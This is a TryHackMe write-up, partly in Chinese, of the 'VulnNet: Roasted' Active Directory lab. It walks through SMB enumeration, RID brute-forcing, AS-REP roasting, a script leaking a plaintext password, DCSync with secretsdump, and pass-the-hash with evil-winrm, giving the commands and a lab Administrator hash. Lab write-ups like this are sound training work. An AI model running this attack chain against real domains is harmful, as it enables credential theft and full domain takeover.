VulnNet:Roasted on Tryhackme

William Lin

2024-03-05

AD, Active Directory, Pentesting, TryHackMe, Windows

Before all

第二次打AD，好玩ww

Victim’s IP : 10.10.225.254
Victim’s Host : vulnnet-rst.local
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command

1	rustscan -a 10.10.225.254 --ulimit 5000 -- -sC -sV -Pn

Result

基本上就是一般架構，port 88有Kerberos，port 445是smb。

Exploit

smb

Command

1	smbclient -L //10.10.225.254 -N

Result
用Anonymous連進去後就是一堆奇怪(?)的文檔，基本上沒有功能。

smb rid enumeration

透過crackmapexec進行smb rid enumeration找出Host, Group, User等相關資訊。
Command

1	crackmapexec smb 10.10.225.254 -u 'guest' -p '' --rid-brute

Result

找到一些user資訊，利用他們進行下一步攻擊。

TGT Attack

*所在目錄：/opt/impacket/examples
Command

1	python3 GetNPUsers.py vulnnet-rst.local/ -usersfile ~/ctf/tryhackme/VulnNet-Roasted/userlist.txt -no-pass

Result
炸出t-skid的密碼hash。

利用密碼爆破工具john解出明文hash

smb information gathering

經由上一步獲得使用者密碼後可以以認證後的身分進入smb
Command

1	smbclient -U VULNNET-RST\\t-skid \\\\10.10.225.254\\NETLOGON

發現可疑檔案ResetPassword.vbs
註：smb: \> get ResetPassword.vbs -

ResetPassword.vbs

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTNamegetting

發現使用者a-whitehat的密碼：bNdKVkjv3RR9ht
利用已取得資訊進行下一步攻擊

secretdump

利用使用者a-whitehat的身分結合 impackets 中的 secretdump.py取得各使用者密碼hash
Command

1	sudo python3 secretsdump.py -just-dc a-whitehat@vulnnet-rst.local

Result

成功!!!

Pass The Hash Attack

利用剛剛獲得的Administrator密碼hash進行 PTH 攻擊
Command

1	evil-winrm -i 10.10.225.254 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d

After all

中間好像有跳步驟，因為user.txt放在使用者enterprise-core-vn的目錄裡，但…隨便 :D
累ㄌ，回去看點Crypto好了(